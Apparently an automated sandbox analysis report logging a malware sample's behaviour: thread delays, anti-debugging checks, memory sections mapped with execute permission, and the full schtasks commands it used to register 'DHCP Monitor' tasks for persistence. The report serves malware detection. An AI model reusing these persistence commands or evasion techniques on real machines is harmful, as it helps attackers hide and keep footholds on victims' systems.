        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWindow / User API: threadDelayed 8951Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWindow / User API: foregroundWindowGot 649Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWindow / User API: foregroundWindowGot 744Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 1384Thread sleep time: -38000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6508Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 6472Thread sleep time: -38000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6604Thread sleep time: -38000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 5088Thread sleep count: 42 > 30Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6756Thread sleep time: -38000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6200Thread sleep count: 44 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1064Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5960Thread sleep count: 39 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6256Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00404A29 FindFirstFileExW,3_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00404A29 FindFirstFileExW,17_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00404A29 FindFirstFileExW,22_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00404A29 FindFirstFileExW,22_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 38000Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 38000Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 38000Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 38000Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,0_2_10001140
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_02282B1F mov eax, dword ptr fs:[00000030h]0_2_02282B1F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0228286F mov eax, dword ptr fs:[00000030h]0_2_0228286F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h]3_2_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_004035F1 mov eax, dword ptr fs:[00000030h]3_1_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 11_2_02992B1F mov eax, dword ptr fs:[00000030h]11_2_02992B1F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 11_2_0299286F mov eax, dword ptr fs:[00000030h]11_2_0299286F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02442B1F mov eax, dword ptr fs:[00000030h]12_2_02442B1F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_0244286F mov eax, dword ptr fs:[00000030h]12_2_0244286F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_004035F1 mov eax, dword ptr fs:[00000030h]14_2_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_004035F1 mov eax, dword ptr fs:[00000030h]14_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_02852B1F mov eax, dword ptr fs:[00000030h]15_2_02852B1F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0285286F mov eax, dword ptr fs:[00000030h]15_2_0285286F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_004035F1 mov eax, dword ptr fs:[00000030h]17_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_1_004035F1 mov eax, dword ptr fs:[00000030h]17_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_004035F1 mov eax, dword ptr fs:[00000030h]22_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_004035F1 mov eax, dword ptr fs:[00000030h]22_1_004035F1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_004067FE GetProcessHeap,3_2_004067FE
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401E1D SetUnhandledExceptionFilter,3_2_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00401E1D SetUnhandledExceptionFilter,3_1_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_1_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_1_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_1_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00401E1D SetUnhandledExceptionFilter,14_2_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00401E1D SetUnhandledExceptionFilter,14_1_00401E1D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_0040446F
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_00401C88
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_1_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00401E1D SetUnhandledExceptionFilter,17_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_1_00401E1D SetUnhandledExceptionFilter,17_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00401E1D SetUnhandledExceptionFilter,22_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00401E1D SetUnhandledExceptionFilter,22_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_1_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_1_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_1_00401F30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Contains functionality to prevent local Windows debuggingShow sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,0_2_10001140
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 11_2_10001140 Cgrlcpdlsle,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,FindCloseChangeNotification,11_2_10001140
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: unknown target: C:\Users\user\Desktop\bGf2H3tXGg.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeSection loaded: unknown target: C:\Users\user\Desktop\bGf2H3tXGg.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe' Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
